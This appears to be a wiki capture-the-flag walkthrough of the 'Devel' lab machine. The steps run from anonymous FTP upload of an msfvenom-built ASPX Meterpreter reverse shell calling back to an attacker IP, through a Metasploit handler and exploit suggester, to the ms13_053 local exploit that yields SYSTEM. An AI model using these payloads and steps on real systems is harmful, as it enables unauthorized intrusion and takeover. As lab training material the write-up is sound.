Devel

From RCATs
Revision as of 17:41, 20 January 2023 by SourMilk (talk | contribs)

NMAP

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 21:06 MST
Nmap scan report for 10.129.28.254
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
| 12-22-22  01:27AM               897112 r.aspx
| 12-22-22  01:17AM                 2921 rev.aspx
| 12-22-22  01:06AM                 2935 reverse.aspx
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds

USER

Generate payload with msfvenom

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx

Upload to FTP with anonymous login we noticed from nmap

❯ ftp anonymous@10.129.28.254
Connected to 10.129.28.254.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put r.aspx                                                                                                        
200 PORT command successful.  
125 Data connection already open; Transfer starting.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
12-22-22  01:27AM               897112 r.aspx
12-22-22  01:17AM                 2921 rev.aspx
12-22-22  01:06AM                 2935 reverse.aspx
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> rm rev.aspx
550 The directory name is invalid.
ftp>

Setup listener within metasploit and visit http://10.129.28.254/r.aspx

msf6 exploit(multi/handler) > set lhost 10.10.16.18
lhost => 10.10.16.18
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       10.10.16.18      yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700

meterpreter >
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privlege Escalation

Now search exploit suggester.

msf6 post(multi/recon/local_exploit_suggester) > set session 1                                                                                                                                                                                 
session => 1                                                                                                                                                                                                                                   
msf6 post(multi/recon/local_exploit_suggester) > exploit   
 #   Name                                                           Potentially Vulnerable?  Check Result                                                                                                                                      
 -   ----                                                           -----------------------  ------------                                                                                                                                      
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.                                                                                                              
 2   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                                                                               
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.                                                                                               
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.                                                                                                              
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                                                                              
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.                                                                                               
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                                                                              
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                                                                               
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                                                                                               
 11  exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                                                                              
 12  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.                                                                                                              
 13  exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

Winner winner!

msf6 exploit(windows/local/ms13_053_schlamperei) > exploit

[*] Started reverse TCP handler on 10.10.16.18:4443
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to 10.129.28.254
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700

meterpreter > getui
[-] Unknown command: getui
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM